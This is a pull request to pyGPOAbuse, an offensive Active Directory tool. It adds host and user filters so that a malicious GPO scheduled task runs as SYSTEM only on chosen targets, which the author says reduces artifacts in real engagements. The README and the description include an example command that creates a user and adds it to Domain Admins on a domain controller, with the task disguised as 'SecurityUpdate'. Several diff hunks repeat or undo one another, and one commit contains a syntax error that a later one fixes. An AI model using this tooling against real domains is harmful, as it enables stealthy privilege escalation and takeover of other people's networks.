### PR TITLE
Added Computer/User filters

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,25 +1,5 @@
 # pyGPOAbuse
 
-## pyGPOAbuseFiltered Additions
-- DISCLAIMER: This was only tested briefly in a local AD environment I take no responsibility for any unprecedented behavior or malfunctioning, it is provided as-is, for authorized testing only, entirely at your own risk.
-- Now supports filtered targeting of users or hosts similar to SharpGPOAbuse
-- Scenario: GPO is linked to the Active-Directory Domain therefore tasks would be applied to all affected objects within said domain (users/hosts) which would leave a ton of unnecesary noise and artifacts. Therefore a more targeted approach is preferred executing commands on specifc targets e.g. the domain controller.
-```bash
-Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
-  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
-  -target-dns-name FQDN
-                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
-  -target-username DOMAIN\USER
-                        User task: only this user processes the task (format: DOMAIN\username)
-  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)
-
-```
-### Example
-```bash
-# Add Domain user and add to Domain Admins via Domain-Controller
-python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local
-```
-
 ## Description
 
 Python **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by[@pkb1s](https://twitter.com/pkb1s)

--- a/README.md
+++ b/README.md
@@ -1,6 +1,7 @@
 # pyGPOAbuse
 
 ## pyGPOAbuseFiltered Additions
+- DISCLAIMER: This was only tested briefly in a local AD environment I take no responsibility for any unprecedented behavior or malfunctioning, it is provided as-is, for authorized testing only, entirely at your own risk.
 - Now supports filtered targeting of users or hosts similar to SharpGPOAbuse
 - Scenario: GPO is linked to the Active-Directory Domain therefore tasks would be applied to all affected objects within said domain (users/hosts) which would leave a ton of unnecesary noise and artifacts. Therefore a more targeted approach is preferred executing commands on specifc targets e.g. the domain controller.
 ```bash

--- a/README.md
+++ b/README.md
@@ -1,5 +1,26 @@
 # pyGPOAbuse
 
+## Filter Additions by D4RKMATT3R
+- DISCLAIMER: This was only tested briefly in a local AD environment I take no responsibility for any unprecedented behavior or malfunctioning, it is provided as-is, for authorized testing only, entirely at your own risk.
+- Now supports filtered targeting of users or hosts similar to SharpGPOAbuse
+- Scenario: GPO is linked to the Active-Directory Domain therefore tasks would be applied to all affected objects within said domain (users/hosts) which would leave a ton of unnecesary noise and artifacts. Therefore a more targeted approach is preferred executing commands on specifc targets e.g. the domain controller.
+```bash
+Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
+  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
+  -target-dns-name FQDN
+                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
+  -target-username DOMAIN\USER
+                        User task: only this user processes the task (format: DOMAIN\username)
+  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)
+
+```
+### Example
+```bash
+# Add Domain user and add to Domain Admins via Domain-Controller
+python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local
+```
+
+
 ## Description
 
 Python **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by[@pkb1s](https://twitter.com/pkb1s)

--- a/README.md
+++ b/README.md
@@ -1,5 +1,19 @@
 # pyGPOAbuse
 
+## pyGPOAbuseFiltered Additions
+- Now supports filtered targeting of users or hosts similar to SharpGPOAbuse
+- Scenario: GPO is linked to the Active-Directory Domain therefore tasks would be applied to all affected objects within said domain (users/hosts) which would leave a ton of unnecesary noise and artifacts. Therefore a more targeted approach is preferred executing commands on specifc targets e.g. the domain controller.
+```bash
+Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
+  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
+  -target-dns-name FQDN
+                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
+  -target-username DOMAIN\USER
+                        User task: only this user processes the task (format: DOMAIN\username)
+  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)
+
+```
+
 ## Description
 
 Python **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by[@pkb1s](https://twitter.com/pkb1s)

--- a/README.md
+++ b/README.md
@@ -14,6 +14,11 @@ Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
   -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)
 
 ```
+### Example
+```bash
+# Add Domain user and add to Domain Admins via Domain-Controller
+python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local
+```
 
 ## Description
 

--- a/pygpoabuse/cli.py
+++ b/pygpoabuse/cli.py
@@ -54,6 +54,15 @@ def main():
     parser.add_argument('-ccache', action='store', help='ccache file name (must be in local directory)')
     parser.add_argument('-f', action='store_true', help='Force add ScheduleTask')
     parser.add_argument('-v', action='count', default=0, help='Verbosity level (-v or -vv)')
+    filtered = parser.add_argument_group("Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled)")
+    filtered.add_argument('-filter-enabled', action='store_true',
+                           help='Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user')
+    filtered.add_argument('-target-dns-name', action='store', default='', metavar='FQDN',
+                           help='Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)')
+    filtered.add_argument('-target-username', action='store', default='', metavar='DOMAIN\\USER',
+                           help='User task: only this user processes the task (format: DOMAIN\\username)')
+    filtered.add_argument('-target-user-sid', action='store', default='', metavar='SID',
+                           help='User task: SID of the targeted user (optional, more robust matching)')
 
     linux = parser.add_argument_group("Linux (Samba AD) options")
     linux.add_argument("--linux-exec", metavar="/PATH/TO/EXEC",
@@ -76,6 +85,18 @@ def main():
         logging.getLogger().setLevel(logging.DEBUG)
     else:
         logging.getLogger().setLevel(25)  # SUCCESS level: show successes, warnings and errors
+    _is_user_task = options.user or options.user_as_admin
+    if options.filter_enabled:
+        if _is_user_task:
+            if not (options.target_username or options.target_user_sid):
+                logging.error("-filter-enabled on a user task requires -target-username and/or -target-user-sid")
+                sys.exit(1)
+        else:
+            if not options.target_dns_name:
+                logging.error("-filter-enabled on a computer task requires -target-dns-name")
+                sys.exit(1)
+    elif options.target_dns_name or options.target_username or options.target_user_sid:
+        logging.warning("Targeting option supplied without -filter-enabled; item-level targeting will NOT be applied")
 
     domain, username, password = parse_credentials(options.target)
 
@@ -182,7 +203,11 @@ def main():
             powershell=options.powershell,
             command=options.command,
             gpo_type=gpo_type,
-            force=options.f
+            force=options.f,
+            filter_enabled=options.filter_enabled,
+            target_dns_name=options.target_dns_name,
+            target_username=options.target_username,
+            target_user_sid=options.target_user_sid
         )
         if task_name:
             if gpo.update_versions(url, domain, options.gpo_id, gpo_type=gpo_type):

--- a/pygpoabuse/gpo.py
+++ b/pygpoabuse/gpo.py
@@ -108,8 +108,8 @@ class GPO:
                     logging.error("This user doesn't seem to have the necessary rights", exc_info=True)
                     return False
         return True
-
-    def update_scheduled_task(self, domain, gpo_id, name="", mod_date="", description="", powershell=False, command="", gpo_type="computer", force=False):
+    ## Added Filter support
+    def update_scheduled_task(self, domain, gpo_id, name="", mod_date="", description="", powershell=False, command="", gpo_type="computer", force=False, filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):
 
         try:
             tid = self._smb_session.connectTree("SYSVOL")
@@ -139,7 +139,7 @@ class GPO:
             fid = self._smb_session.openFile(tid, path)
             st_content = self._smb_session.readFile(tid, fid, singleCall=False).decode("utf-8")
             st = ScheduledTask(gpo_type=gpo_type, name=name, mod_date=mod_date, description=description,
-                               powershell=powershell, command=command, old_value=st_content)
+                               powershell=powershell, command=command, old_value=st_content, filter_enabled=filter_enabled,target_dns_name=target_dns_name,target_username=target_username, target_user_sid=target_user_sid)
             tasks = st.parse_tasks(st_content)
 
             if not force:
@@ -169,7 +169,7 @@ class GPO:
             except Exception:
                 logging.error("This user doesn't seem to have the necessary rights", exc_info=True)
                 return False
-            st = ScheduledTask(gpo_type=gpo_type, name=name, mod_date=mod_date, description=description, powershell=powershell, command=command)
+            st = ScheduledTask(gpo_type=gpo_type, name=name, mod_date=mod_date, description=description, powershell=powershell, command=command, filter_enabled=filter_enabled,target_dns_name=target_dns_name,target_username=target_username, target_user_sid=target_user_sid)
             new_content = st.generate_scheduled_task_xml()
 
         try:

--- a/pygpoabuse/scheduledtask.py
+++ b/pygpoabuse/scheduledtask.py
@@ -11,7 +11,7 @@ import xml.etree.ElementTree as ET
 
 
 class ScheduledTask:
-    def __init__(self, gpo_type="computer", name="", mod_date="", description="", powershell=False, command="", old_value=""):
+    def __init__(self, gpo_type="computer", name="", mod_date="", description="", powershell=False, command="", old_value="",, filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):
         self._type = gpo_type
 
         if name:
@@ -54,6 +54,31 @@ class ScheduledTask:
             self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="NT AUTHORITY\\System" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITY\\System</UserId><LogonType>S4U</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
         else:
             self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
+
+        # Targeting single hosts/users through filtering 
+        # host (computer GPO) or principal (user GPO) instead of every object in the GPO scope
+        # XML mirrors SharpGPOAbuse --FilterEnabled output.
+        self._filters = ""
+        if filter_enabled:
+            if self._type == "computer":
+                if target_dns_name:
+                    _dns = escape(target_dns_name, {'"': '&quot;'})
+                    self._filters = '<Filters><FilterComputer bool="AND" not="0" type="DNS" name="{}"/></Filters>'.format(_dns)
+            else:
+                if target_username or target_user_sid:
+                    _fu = '<FilterUser bool="AND" not="0"'
+                    if target_username:
+                        _fu += ' name="{}"'.format(escape(target_username, {'"': '&quot;'}))
+                    if target_user_sid:
+                        _fu += ' sid="{}"'.format(escape(target_user_sid, {'"': '&quot;'}))
+                    _fu += '/>'
+                    self._filters = '<Filters>{}</Filters>'.format(_fu)
+
+        if self._filters:
+            self._task_str = self._task_str.replace(
+                "</Properties></ImmediateTaskV2>",
+                "</Properties>" + self._filters + "</ImmediateTaskV2>"
+            )
 
         self._task_str_end = f"""</ScheduledTasks>"""
 

--- a/pygpoabuse/scheduledtask.py
+++ b/pygpoabuse/scheduledtask.py
@@ -11,7 +11,7 @@ import xml.etree.ElementTree as ET
 
 
 class ScheduledTask:
-    def __init__(self, gpo_type="computer", name="", mod_date="", description="", powershell=False, command="", old_value="",, filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):
+    def __init__(self, gpo_type="computer", name="", mod_date="", description="", powershell=False, command="", old_value="", filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):
         self._type = gpo_type
 
         if name:


### PR DESCRIPTION
Hey I added computer and user filters similar to SharpGPOAbuse:
- `-filter-enabled` enables filtering
- `-target-dns-name FQDN` targets specific host
- `-target-username DOMAIN\username` targets specific user on specified host by username
- `-target-user-sid` targets specific user on specified host by SID 

Example Command:
```bash
python3 pygpoabuse.py red.local/user:password -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local
```

Tested in my local AD environment and everything seems to work as intended. The main purpose of this is ofcourse to avoid mass artifacts and task creation on inherited objects to make this more applicable in real engagements.
